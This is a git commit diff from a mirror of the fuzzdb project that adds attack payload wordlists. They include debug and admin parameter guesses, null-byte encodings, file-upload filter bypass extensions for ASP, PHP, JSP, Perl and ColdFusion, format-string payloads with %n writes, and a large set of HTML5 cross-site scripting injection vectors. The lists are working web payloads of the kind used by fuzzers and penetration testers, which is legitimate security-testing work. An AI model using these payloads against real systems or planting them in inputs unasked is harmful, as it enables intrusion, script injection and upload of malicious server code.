mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 02:53:03 +00:00
Fix #144
This commit is contained in:
parent
f7aa901576
commit
2863f7a588
150 changed files with 133977 additions and 0 deletions
40
attack/business-logic/CommonDebugParamNames.txt
Normal file
40
attack/business-logic/CommonDebugParamNames.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
7357=1
|
||||
7357=true
|
||||
7357=y
|
||||
7357=yes
|
||||
access=1
|
||||
access=true
|
||||
access=y
|
||||
access=yes
|
||||
adm=1
|
||||
adm1n=1
|
||||
adm1n=true
|
||||
adm1n=y
|
||||
adm1n=yes
|
||||
admin=1
|
||||
admin=true
|
||||
admin=y
|
||||
admin=yes
|
||||
adm=true
|
||||
adm=y
|
||||
adm=yes
|
||||
dbg=1
|
||||
dbg=true
|
||||
dbg=y
|
||||
dbg=yes
|
||||
debug=1
|
||||
debug=true
|
||||
debug=y
|
||||
debug=yes
|
||||
edit=1
|
||||
edit=true
|
||||
edit=y
|
||||
edit=yes
|
||||
grant=1
|
||||
grant=true
|
||||
grant=y
|
||||
grant=yes
|
||||
test=1
|
||||
test=true
|
||||
test=y
|
||||
test=yes
|
40
attack/business-logic/CommonMethodNames.txt
Normal file
40
attack/business-logic/CommonMethodNames.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
get
|
||||
put
|
||||
send
|
||||
delete
|
||||
remove
|
||||
create
|
||||
add
|
||||
move
|
||||
show
|
||||
list
|
||||
query
|
||||
search
|
||||
view
|
||||
open
|
||||
show
|
||||
download
|
||||
edit
|
||||
change
|
||||
alter
|
||||
modify
|
||||
test
|
||||
update
|
||||
save
|
||||
load
|
||||
close
|
||||
make
|
||||
upload
|
||||
rename
|
||||
reset
|
||||
cancel
|
||||
admin
|
||||
demo
|
||||
verify
|
||||
vrfy
|
||||
on
|
||||
off
|
||||
0
|
||||
1
|
||||
enable
|
||||
disable
|
30
attack/control-chars/NullByteRepresentations.txt
Normal file
30
attack/control-chars/NullByteRepresentations.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
%00
|
||||
\x00
|
||||
\x00\
|
||||
\u0000
|
||||
\u0000
|
||||
\0
|
||||
\0\
|
||||
\00
|
||||
\00\
|
||||
\000
|
||||
\000\
|
||||
\z
|
||||
\z\
|
||||
NUL
|
||||
NULL
|
||||
0x00
|
||||
%00%00
|
||||
\x00\x00
|
||||
\x00\x00\
|
||||
\u0000\u0000
|
||||
\u0000\u0000\
|
||||
\0\0
|
||||
\0\0\
|
||||
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
|
||||
%C0%80
|
||||
%E0%80%80
|
||||
%F0%80%80%80
|
||||
%F8%80%80%80%80
|
||||
%FC%80%80%80%80%80
|
||||
%FE%80%80%80%80%80%80
|
10
attack/disclosure-directory/directory-indexing-generic.txt
Normal file
10
attack/disclosure-directory/directory-indexing-generic.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
/%3f.jsp
|
||||
/?M=D
|
||||
/?S=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
/cgi-bin/test-cgi?/*
|
||||
/cgi-bin/test-cgi?*
|
||||
/%00/
|
||||
/%2e/
|
||||
/%2f/
|
||||
/%5c/
|
30
attack/file-upload/alt-extensions-asp.txt
Normal file
30
attack/file-upload/alt-extensions-asp.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
asp
|
||||
aspx
|
||||
asa
|
||||
aSP
|
||||
aSpx
|
||||
aSa
|
||||
asp%20%20%20
|
||||
aspx%20%20%20
|
||||
asa%20%20%20
|
||||
aSP%20%20%20
|
||||
aSpx%20%20%20
|
||||
aSa%20%20%20
|
||||
asp......
|
||||
aspx......
|
||||
asa......
|
||||
aSP......
|
||||
aSpx......
|
||||
aSa......
|
||||
asp%20%20%20...%20.%20..
|
||||
aspx%20%20%20...%20.%20..
|
||||
asa%20%20%20...%20.%20..
|
||||
aSP%20%20%20...%20.%20..
|
||||
aSpx%20%20%20...%20.%20..
|
||||
aSa%20%20%20...%20.%20..
|
||||
asp%00
|
||||
aspx%00
|
||||
asa%00
|
||||
aSp%00
|
||||
aSpx%00
|
||||
aSa%00
|
40
attack/file-upload/alt-extensions-coldfusion.txt
Normal file
40
attack/file-upload/alt-extensions-coldfusion.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
cfm
|
||||
cfml
|
||||
cfc
|
||||
dbm
|
||||
cFm
|
||||
cFml
|
||||
cFc
|
||||
dBm
|
||||
cfm%20%20%20
|
||||
cfml%20%20%20
|
||||
cfc%20%20%20
|
||||
dbm%20%20%20
|
||||
cFm%20%20%20
|
||||
cFml%20%20%20
|
||||
cFc%20%20%20
|
||||
dBm%20%20%20
|
||||
cfm......
|
||||
cfml......
|
||||
cfc.......
|
||||
dbm......
|
||||
cFm......
|
||||
cFml......
|
||||
cFc......
|
||||
dBm......
|
||||
cfm%20%20%20...%20.%20..
|
||||
cfml%20%20%20...%20.%20..
|
||||
cfc%20%20%20...%20.%20..
|
||||
dbm%20%20%20...%20.%20..
|
||||
cFm%20%20%20...%20.%20..
|
||||
cFml%20%20%20...%20.%20..
|
||||
cFc%20%20%20...%20.%20..
|
||||
dBm%20%20%20...%20.%20..
|
||||
cfm%00
|
||||
cfml%00
|
||||
cfc%00
|
||||
dbm%00
|
||||
cFm%00
|
||||
cFml%00
|
||||
cFc%00
|
||||
dBm%00
|
50
attack/file-upload/alt-extensions-jsp.txt
Normal file
50
attack/file-upload/alt-extensions-jsp.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
jsp
|
||||
jspx
|
||||
jsw
|
||||
jsv
|
||||
jspf
|
||||
jSp
|
||||
jSpx
|
||||
jSw
|
||||
jSv
|
||||
jSpf
|
||||
jSp%00
|
||||
jSp%20%20%20
|
||||
jSp%20%20%20...%20.%20..a
|
||||
jSp......
|
||||
jSpf%00
|
||||
jSpf%20%20%20
|
||||
jSpf%20%20%20...%20.%20..a
|
||||
jSpf......
|
||||
jSpx%00
|
||||
jSpx%20%20%20
|
||||
jSpx%20%20%20...%20.%20..a
|
||||
jSpx......
|
||||
jSv%00
|
||||
jSv%20%20%20
|
||||
jSv%20%20%20...%20.%20..a
|
||||
jSv......
|
||||
jSw%00
|
||||
jSw%20%20%20
|
||||
jSw%20%20%20...%20.%20..a
|
||||
jSw......
|
||||
jsp%00
|
||||
jsp%20%20%20
|
||||
jsp%20%20%20...%20.%20..a
|
||||
jsp......
|
||||
jspf%00
|
||||
jspf%20%20%20
|
||||
jspf%20%20%20...%20.%20..a
|
||||
jspf......
|
||||
jspx%00
|
||||
jspx%20%20%20
|
||||
jspx%20%20%20...%20.%20..a
|
||||
jspx......
|
||||
jsv%00
|
||||
jsv%20%20%20
|
||||
jsv%20%20%20...%20.%20..a
|
||||
jsv......
|
||||
jsw%00
|
||||
jsw%20%20%20
|
||||
jsw%20%20%20...%20.%20..a
|
||||
jsw......
|
33
attack/file-upload/alt-extensions-perl.txt
Normal file
33
attack/file-upload/alt-extensions-perl.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# .pm .lib cannot be called directly, must be called as modules
|
||||
pl
|
||||
pm
|
||||
cgi
|
||||
pL
|
||||
pM
|
||||
cGi
|
||||
lib
|
||||
lIb
|
||||
cGi%00
|
||||
cGi%20%20%20
|
||||
cGi......
|
||||
cgi%00
|
||||
cgi%20%20%20
|
||||
cgi......
|
||||
lIb%00
|
||||
lIb%20%20%20
|
||||
lIb......
|
||||
lib%00
|
||||
lib%20%20%20
|
||||
lib......
|
||||
pL%00
|
||||
pL%20%20%20
|
||||
pL......
|
||||
pM%00
|
||||
pM%20%20%20
|
||||
pM......
|
||||
pl%00
|
||||
pl%20%20%20
|
||||
pl......
|
||||
pm%00
|
||||
pm%20%20%20
|
||||
pm......
|
60
attack/file-upload/alt-extensions-php.txt
Normal file
60
attack/file-upload/alt-extensions-php.txt
Normal file
|
@ -0,0 +1,60 @@
|
|||
phtml
|
||||
php
|
||||
php3
|
||||
php4
|
||||
php5
|
||||
inc
|
||||
pHtml
|
||||
pHp
|
||||
pHp3
|
||||
pHp4
|
||||
pHp5
|
||||
iNc
|
||||
iNc%00
|
||||
iNc%20%20%20
|
||||
iNc%20%20%20...%20.%20..
|
||||
iNc......
|
||||
inc%00
|
||||
inc%20%20%20
|
||||
inc%20%20%20...%20.%20..
|
||||
inc......
|
||||
pHp%00
|
||||
pHp%20%20%20
|
||||
pHp%20%20%20...%20.%20..
|
||||
pHp......
|
||||
pHp3%00
|
||||
pHp3%20%20%20
|
||||
pHp3%20%20%20...%20.%20..
|
||||
pHp3......
|
||||
pHp4%00
|
||||
pHp4%20%20%20
|
||||
pHp4%20%20%20...%20.%20..
|
||||
pHp4......
|
||||
pHp5%00
|
||||
pHp5%20%20%20
|
||||
pHp5%20%20%20...%20.%20..
|
||||
pHp5......
|
||||
pHtml%00
|
||||
pHtml%20%20%20
|
||||
pHtml%20%20%20...%20.%20..
|
||||
pHtml......
|
||||
php%00
|
||||
php%20%20%20
|
||||
php%20%20%20...%20.%20..
|
||||
php......
|
||||
php3%00
|
||||
php3%20%20%20
|
||||
php3%20%20%20...%20.%20..
|
||||
php3......
|
||||
php4%00
|
||||
php4%20%20%20
|
||||
php4%20%20%20...%20.%20..
|
||||
php4......
|
||||
php5%00
|
||||
php5%20%20%20
|
||||
php5%20%20%20...%20.%20..
|
||||
php5......
|
||||
phtml%00
|
||||
phtml%20%20%20
|
||||
phtml%20%20%20...%20.%20..
|
||||
phtml......
|
|
@ -0,0 +1,9 @@
|
|||
templates_compiled
|
||||
templates_c
|
||||
templates
|
||||
temporary
|
||||
images
|
||||
cache
|
||||
temp
|
||||
files
|
||||
tmp
|
|
@ -0,0 +1,8 @@
|
|||
{ASPSCRIPT}
|
||||
{ASPSCRIPT}.{EXT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.{EXT}
|
||||
{ASPSCRIPT}%00
|
||||
{ASPSCRIPT}%00.{EXT}
|
||||
{ASPSCRIPT}::data%00.
|
||||
{ASPSCRIPT}::data%00.{EXT}
|
58
attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt
Normal file
58
attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt
Normal file
|
@ -0,0 +1,58 @@
|
|||
{ASPSCRIPT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.jpg
|
||||
{ASPSCRIPT};.pdf
|
||||
{ASPSCRIPT};.html
|
||||
{ASPSCRIPT};.htm
|
||||
{ASPSCRIPT};.txt
|
||||
{ASPSCRIPT};.xyz
|
||||
{ASPSCRIPT};.zip
|
||||
{ASPSCRIPT};.tgz
|
||||
{ASPSCRIPT};.doc
|
||||
{ASPSCRIPT};.docx
|
||||
{ASPSCRIPT};.xls
|
||||
{ASPSCRIPT};.xlsx
|
||||
{ASPSCRIPT}%00.jpg
|
||||
{ASPSCRIPT}%00.pdf
|
||||
{ASPSCRIPT}%00.html
|
||||
{ASPSCRIPT}%00.txt
|
||||
{ASPSCRIPT}%00.xyz
|
||||
{ASPSCRIPT}%00.tgz
|
||||
{ASPSCRIPT}%00.zip
|
||||
{ASPSCRIPT}%00.doc
|
||||
{ASPSCRIPT}%00.docx
|
||||
{ASPSCRIPT}%00
|
||||
{ASPSCRIPT}::data%00.jpg
|
||||
{ASPSCRIPT}::data%00.pdf
|
||||
{ASPSCRIPT}::data%00.html
|
||||
{ASPSCRIPT}::data%00.txt
|
||||
{ASPSCRIPT}::data%00.zip
|
||||
{ASPSCRIPT}::data%00.doc
|
||||
{ASPSCRIPT}::data%00.xls
|
||||
{ASPSCRIPT}%00%20%20%20
|
||||
{ASPSCRIPT}%00%20%20%20...%20.%20..
|
||||
{ASPSCRIPT}%00......
|
||||
{ASPSCRIPT}%20%20%20
|
||||
{ASPSCRIPT}%20%20%20...%20.%20..
|
||||
{ASPSCRIPT}......
|
||||
{ASPSCRIPT}::data%00%%20%20%20
|
||||
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..
|
||||
{ASPSCRIPT}::data%00%......
|
||||
{ASPSCRIPT}%00%20%20%20;.jpg
|
||||
{ASPSCRIPT}%00%20%20%20;.doc
|
||||
{ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg
|
||||
{ASPSCRIPT}%00%20%20%20...%20.%20..;.doc
|
||||
{ASPSCRIPT}%00......;.jpg
|
||||
{ASPSCRIPT}%00......;.doc
|
||||
{ASPSCRIPT}%20%20%20;.jpg
|
||||
{ASPSCRIPT}%20%20%20;.doc
|
||||
{ASPSCRIPT}%20%20%20...%20.%20..;.jpg
|
||||
{ASPSCRIPT}%20%20%20...%20.%20..;.doc
|
||||
{ASPSCRIPT}......;.jpg
|
||||
{ASPSCRIPT}......;.doc
|
||||
{ASPSCRIPT}::data%00%%20%20%20;.jpg
|
||||
{ASPSCRIPT}::data%00%%20%20%20;.doc
|
||||
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg
|
||||
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc
|
||||
{ASPSCRIPT}::data%00%......;.jpg
|
||||
{ASPSCRIPT}::data%00%......;.doc
|
7
attack/file-upload/file-ul-filter-bypass-ms-php.txt
Normal file
7
attack/file-upload/file-ul-filter-bypass-ms-php.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php::$DATA
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
||||
{PHPSCRIPT}::$DATA
|
|
@ -0,0 +1,3 @@
|
|||
%00index.html
|
||||
;index.html
|
||||
%00
|
|
@ -0,0 +1,5 @@
|
|||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
7
attack/file-upload/invalid-filenames-linux.txt
Normal file
7
attack/file-upload/invalid-filenames-linux.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
/
|
||||
|
||||
\0
|
||||
/dev/null
|
||||
/dev/null/foo
|
||||
.
|
||||
..
|
31
attack/file-upload/invalid-filenames-microsoft.txt
Normal file
31
attack/file-upload/invalid-filenames-microsoft.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
CON.{EXT}
|
||||
PRN.{EXT}
|
||||
AUX.{EXT}
|
||||
CLOCK$.{EXT}
|
||||
NUL.{EXT}
|
||||
COM1.{EXT}
|
||||
COM2.{EXT}
|
||||
COM3.{EXT}
|
||||
COM4.{EXT}
|
||||
COM5.{EXT}
|
||||
COM6.{EXT}
|
||||
COM7.{EXT}
|
||||
COM8.{EXT}
|
||||
COM9.{EXT}
|
||||
LPT1.{EXT}
|
||||
LPT2.{EXT}
|
||||
LPT3.{EXT}
|
||||
LPT4.{EXT}
|
||||
LPT5.{EXT}
|
||||
LPT6.{EXT}
|
||||
LPT7.{EXT}
|
||||
LPT8.{EXT}
|
||||
LPT9.{EXT}
|
||||
*.{EXT}
|
||||
".{EXT}
|
||||
[.{EXT}
|
||||
].{EXT}
|
||||
:.{EXT}
|
||||
|.{EXT}
|
||||
=.{EXT}
|
||||
,.{EXT}
|
12
attack/file-upload/invalid-filesystem-chars-microsoft.txt
Normal file
12
attack/file-upload/invalid-filesystem-chars-microsoft.txt
Normal file
|
@ -0,0 +1,12 @@
|
|||
*
|
||||
.
|
||||
"
|
||||
/
|
||||
\
|
||||
[
|
||||
]
|
||||
:
|
||||
;
|
||||
|
|
||||
=
|
||||
,
|
3
attack/file-upload/invalid-filesystem-chars-osx.txt
Normal file
3
attack/file-upload/invalid-filesystem-chars-osx.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
# list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
# fuzz these into a filename during upload attempts
|
||||
:
|
57
attack/format-strings/format-strings.txt
Normal file
57
attack/format-strings/format-strings.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
%s%p%x%d
|
||||
%p%p%p%p
|
||||
%x%x%x%x
|
||||
%d%d%d%d
|
||||
%s%s%s%s
|
||||
%99999999999s
|
||||
%08x
|
||||
%20d
|
||||
%20n
|
||||
%20x
|
||||
%20s
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
||||
%08x.%08x.%08x.%08x.%08x\n
|
||||
XXX0_%08x.%08x.%08x.%08x.%08x\n
|
||||
%.16705u%2\$hn
|
||||
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
|
||||
AAAAA%c
|
||||
AAAAA%d
|
||||
AAAAA%e
|
||||
AAAAA%f
|
||||
AAAAA%I
|
||||
AAAAA%o
|
||||
AAAAA%p
|
||||
AAAAA%s
|
||||
AAAAA%x
|
||||
AAAAA%n
|
||||
ppppp%c
|
||||
ppppp%d
|
||||
ppppp%e
|
||||
ppppp%f
|
||||
ppppp%I
|
||||
ppppp%o
|
||||
ppppp%p
|
||||
ppppp%s
|
||||
ppppp%x
|
||||
ppppp%n
|
||||
%@
|
||||
%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@
|
142
attack/html_js_fuzz/HTML5sec_Injections.txt
Normal file
142
attack/html_js_fuzz/HTML5sec_Injections.txt
Normal file
|
@ -0,0 +1,142 @@
|
|||
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
|
||||
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
|
||||
<input onfocus=write(1) autofocus>
|
||||
<input onblur=write(1) autofocus><input autofocus>
|
||||
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
|
||||
<video poster=javascript:alert(1)//></video>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
|
||||
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
||||
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
|
||||
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
|
||||
<script>({0:#0=alert/#0#/#0#(0)})</script>
|
||||
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
|
||||
<?xml-stylesheet href="javascript:alert(1)"?><root/>
|
||||
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
|
||||
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
|
||||
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
|
||||
<input onblur=focus() autofocus><input>
|
||||
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
|
||||
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
|
||||
<script src="#">{alert(1)}</script>;1
|
||||
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
|
||||
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
|
||||
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
|
||||
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
|
||||
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
|
||||
<frameset onload=alert(1)>
|
||||
<table background="javascript:alert(1)"></table>
|
||||
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
|
||||
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
|
||||
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
||||
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
|
||||
<!--<img src="--><img src=x onerror=alert(1)//">
|
||||
<comment><img src="</comment><img src=x onerror=alert(1)//">
|
||||
<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
|
||||
<style><img src="</style><img src=x onerror=alert(1)//">
|
||||
<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
|
||||
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
|
||||
<?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html>
|
||||
<style>*[{}@import'test.css?]{color: green;}</style>X
|
||||
<div style="font-family:'foo[a];color:red;';">XXX</div>
|
||||
<div style="font-family:foo}color=red;">XXX</div>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
|
||||
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
|
||||
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
||||
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
|
||||
<x style="behavior:url(test.sct)">
|
||||
<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
||||
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
|
||||
<video><source onerror="alert(1)">
|
||||
<video onerror="alert(1)"><source></source></video>
|
||||
<b <script>alert(1)//</script>0</script></b>
|
||||
<b><script<b></b><alert(1)</script </b></b>
|
||||
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
||||
<div style="[a]color[b]:[c]red">XXX</div>
|
||||
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>
|
||||
<!-- IE 6-8 --><x '="foo"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'>
|
||||
